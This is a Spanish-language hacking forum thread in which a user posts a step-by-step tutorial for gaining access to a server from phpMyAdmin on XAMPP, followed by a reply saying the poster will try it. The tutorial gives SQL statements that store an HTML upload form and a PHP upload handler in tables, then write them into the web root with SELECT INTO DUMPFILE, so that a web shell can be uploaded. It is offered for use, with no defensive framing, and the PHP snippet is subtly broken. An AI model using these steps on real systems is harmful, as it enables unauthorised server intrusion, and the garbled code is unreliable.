send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Subir shell desde phpmyadmin (xampp)

  • 1 Respuestas
  • 2440 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 62
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Julio 09, 2015, 03:29:07 pm »
Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:

Lo primero que debemos hacer es tener acceso al phpmyadmin.
Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes scripts:

El primero es este:
Código: You are not allowed to view links. Register or Login
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho esto debemos dar a continuar y poner un nuevo script, que es este:
Código: You are not allowed to view links. Register or Login
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho este segundo paso insertamos el nuevo script con los mismos pasos anteriores, que es este:
Código: You are not allowed to view links. Register or Login
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload file to the server</title>
</head>
<body bgcolor="white">
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp; Upload !!! </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');

Luego de haber subido el tercer script uploader nos vamos al siguiente script:
Código: You are not allowed to view links. Register or Login
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform
Luego de haber hecho este paso insertaremos el siguiente script con los mismos pasos anteriores:
Código: You are not allowed to view links. Register or Login
INSERT INTO user_upload
VALUES (
"<?php $uploaddir 'C:/xampp/htdocs/'$uploadfile $uploaddir basename($_FILES['userfile']['name']); if 

(
move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div 

align=center><font size=5 color=#ff0000>Archivo subido con éxito !!</font></body>'
; } else { print '<body 

bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000>Error al subir el archivo !!</font></body>'
; } ?>
"
)

Ya hecho este penúltimo paso nos vamos al último script que nos dará el privilegio de subir la shell al directorio principal del servidor:
Código: You are not allowed to view links. Register or Login
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a You are not allowed to view links. Register or Login y así podremos subir la shell.

Saludos.
« Última modificación: Agosto 20, 2017, 05:39:53 am por Decode »

Desconectado DeBobiPro

  • *
  • Underc0der
  • Mensajes: 205
  • Actividad:
    0%
  • Reputación 2
  • Como no sabía que era imposible, lo hice.
    • Ver Perfil
« Respuesta #1 en: Julio 09, 2015, 04:51:14 pm »
Interesante BRO!

andaba buscando algo así, lo probaré y les cuento como me va.



Saludos!
Nivel 77 You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Desarrollo de exploits con metasploit desde cero en (ESPAÑOL)

Iniciado por REC

Respuestas: 1
Vistas: 3035
Último mensaje Mayo 17, 2012, 03:29:55 pm
por kid_goth
[Propuesta] Taller de Pentesting desde 0

Iniciado por blood_rec

Respuestas: 38
Vistas: 13186
Último mensaje Octubre 06, 2012, 09:38:16 am
por Barym